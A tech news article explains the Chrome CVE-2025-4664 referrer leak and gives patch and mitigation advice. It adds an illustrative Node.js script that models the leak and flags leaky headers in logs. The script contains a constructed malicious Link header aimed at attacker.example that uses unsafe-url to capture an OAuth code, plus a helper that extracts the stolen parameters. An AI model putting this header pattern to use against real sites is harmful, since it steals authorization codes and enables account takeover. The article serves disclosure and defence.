Google Fixes Chrome Vulnerability That Lets Attackers Steal User Accounts
By Netvora Tech News
Google has fixed a high-severity vulnerability in its Chrome browser that could be used to hijack user accounts. The company warns that a public exploit for the issue is already available. The vulnerability, tracked as CVE-2025-4664, is an insufficient policy enforcement bug in the browser's Loader component.
The issue lets an attacker leak data from pages on other sites that the user has open in the browser, provided one of those pages loads a resource, such as an image, from a server the attacker controls. Chrome honours the HTTP Link header on such subresource responses, and that header can set the referrer policy for the request it triggers. With a policy of unsafe-url the attacker's server receives the full URL of the page, query string included, in the Referer header. Query strings can carry sensitive values, for example the authorization code in an OAuth flow, so capturing them can lead to account takeover.
Security researcher Vsevolod Kokorin, who reported the vulnerability on May 5, explains that Chrome, unlike other browsers, resolves the Link header on subresource requests, and that this header can specify a referrer policy of unsafe-url, which exposes the full query string. "Query parameters can contain sensitive data, such as in OAuth flows, which could be used to take over a user's account," Kokorin said.
How the Vulnerability Works
The attack needs Chrome to fetch a resource from an attacker-controlled server, for instance an image embedded in a page, while that page carries sensitive data in its URL. Because Chrome applies the Link header of such a subresource response, the attacker's response can instruct the browser to preload a further URL under a referrer policy of the attacker's choosing:
- The Link header on the attacker's response requests a preload with referrerpolicy=unsafe-url, overriding the default policy (strict-origin-when-cross-origin), which would send only the page's origin to a cross-origin destination.
- The preload request therefore carries the full URL of the page in its Referer header, including any query parameters, which can contain sensitive values such as the authorization code in an OAuth flow.
- The attacker's server reads the query parameters out of the Referer and can use them to take over the user's account or to access other sensitive information.
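The following Node.js script is an added example, not code from the article, from Kokorin's writeup or from Chromium. It models the leak described above: it parses a Link header, computes the Referer a request would carry under each referrer policy, shows what an unsafe-url preload exposes from a page whose URL contains an OAuth authorization code, and flags such headers the way a proxy or CDN log scanner could. All URLs, header values and function names are constructed for illustration; the referrer-policy logic covers the main cases of the Referrer Policy specification rather than every edge case.

```javascript
// Added example, not code from the article or from Chromium. It models the
// leak CVE-2025-4664 relies on: a Link header on a subresource response asking
// for a preload with referrerpolicy=unsafe-url, which carries the embedding
// page's full URL (query string included) to the preload target. All URLs,
// header values and helper names here are constructed for illustration.

// Parse an HTTP Link header (RFC 8288) into { url, params } entries.
// Simplified: parameter values may be quoted but must not contain ';' or ','.
function parseLinkHeader(header) {
  const links = [];
  const re = /<([^>]*)>((?:\s*;\s*[^;,]*)*)/g;
  let m;
  while ((m = re.exec(header)) !== null) {
    const params = {};
    for (const part of m[2].split(';')) {
      const t = part.trim();
      if (!t) continue;
      const eq = t.indexOf('=');
      const key = (eq === -1 ? t : t.slice(0, eq)).trim().toLowerCase();
      const val = eq === -1 ? '' : t.slice(eq + 1).trim().replace(/^"(.*)"$/, '$1');
      params[key] = val;
    }
    links.push({ url: m[1], params });
  }
  return links;
}

// Every referrer policy strips credentials and the fragment before sending a Referer.
function fullReferrer(documentUrl) {
  const u = new URL(documentUrl);
  u.username = ''; u.password = ''; u.hash = '';
  return u.href;
}
function originReferrer(documentUrl) { return new URL(documentUrl).origin + '/'; }

// Referer a request to requestUrl carries when issued from documentUrl under
// policy (main cases of the Referrer Policy spec; null means no Referer header).
function refererFor(documentUrl, requestUrl, policy) {
  const doc = new URL(documentUrl), req = new URL(requestUrl);
  const sameOrigin = doc.origin === req.origin;
  const downgrade = doc.protocol === 'https:' && req.protocol !== 'https:';
  switch (policy) {
    case 'no-referrer': return null;
    case 'unsafe-url': return fullReferrer(documentUrl);
    case 'origin': return originReferrer(documentUrl);
    case 'same-origin': return sameOrigin ? fullReferrer(documentUrl) : null;
    case 'strict-origin': return downgrade ? null : originReferrer(documentUrl);
    case 'origin-when-cross-origin': return sameOrigin ? fullReferrer(documentUrl) : originReferrer(documentUrl);
    case 'no-referrer-when-downgrade': return downgrade ? null : fullReferrer(documentUrl);
    default: // '' or 'strict-origin-when-cross-origin', Chrome's default since version 85
      if (downgrade) return null;
      return sameOrigin ? fullReferrer(documentUrl) : originReferrer(documentUrl);
  }
}

// Model of the flawed behaviour: each rel=preload entry in a subresource
// response's Link header is fetched under that entry's own referrerpolicy.
// Returns, per preload, its target, the Referer it would carry, and whether
// that Referer exposes the embedding page's query string.
function preloadReferers(documentUrl, linkHeader) {
  const query = new URL(documentUrl).search;
  return parseLinkHeader(linkHeader)
    .filter(l => (l.params.rel || '').split(/\s+/).includes('preload'))
    .map(l => {
      const referer = refererFor(documentUrl, l.url, l.params.referrerpolicy || '');
      return { target: l.url, referer, leaksQuery: query !== '' && referer !== null && referer.includes(query) };
    });
}

// What the attacker's server recovers from a leaked Referer.
function paramsFromReferer(referer) {
  return Object.fromEntries(new URL(referer).searchParams);
}

// Detection helper for proxy or CDN logs: flag Link headers whose preload would
// send the embedding page's query string to a different origin.
function flagLeakyLinkHeaders(documentUrl, linkHeaders) {
  const docOrigin = new URL(documentUrl).origin;
  return linkHeaders.filter(h =>
    preloadReferers(documentUrl, h).some(p => p.leaksQuery && new URL(p.target).origin !== docOrigin));
}

// Constructed scenario: an OAuth callback page embeds an image from a third
// party; that image's response carries the malicious Link header.
const CALLBACK_URL = 'https://app.example/oauth/callback?code=AUTHCODE123&state=xyz#top';
const MALICIOUS_LINK = '<https://attacker.example/collect.png>; rel=preload; as=image; referrerpolicy=unsafe-url';
const BENIGN_LINK = '<https://cdn.example/font.woff2>; rel=preload; as=font; crossorigin';

function demo() {
  const [leak] = preloadReferers(CALLBACK_URL, MALICIOUS_LINK);
  const stolen = leak.leaksQuery ? paramsFromReferer(leak.referer) : {};
  return { referer: leak.referer, stolen, flagged: flagLeakyLinkHeaders(CALLBACK_URL, [MALICIOUS_LINK, BENIGN_LINK]) };
}

if (typeof require !== 'undefined' && require.main === module) console.log(JSON.stringify(demo(), null, 2));
```

Running `demo()` shows the malicious preload carrying `https://app.example/oauth/callback?code=AUTHCODE123&state=xyz` as its Referer, from which `code` and `state` are trivially recovered, while the benign preload under the default policy receives only `https://app.example/`. The same `refererFor` function shows why a site's own `Referrer-Policy` header is not a reliable defence here: the leak is decided per request by the policy the Link header names, so the safer fix on the application side is to keep secrets out of page URLs in the first place.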
Impact and Mitigation
The vulnerability is fixed in Chrome 136.0.7103.113/.114 for Windows and macOS and in 136.0.7103.113 for Linux. The new versions are being rolled out automatically over the coming days and weeks.
Users who do not want to wait can trigger the update from chrome://settings/help (Menu > Help > About Google Chrome); the same page shows the installed version, which should read 136.0.7103.113 or later once the fix is in place.
Until the update is installed, users should be careful about which websites they visit and keep their browser and operating system up to date. Site operators can reduce their exposure by not leaving secrets such as OAuth authorization codes in page URLs longer than necessary (consume the code and redirect to a clean URL) and by avoiding third-party subresources on pages whose URLs carry such values.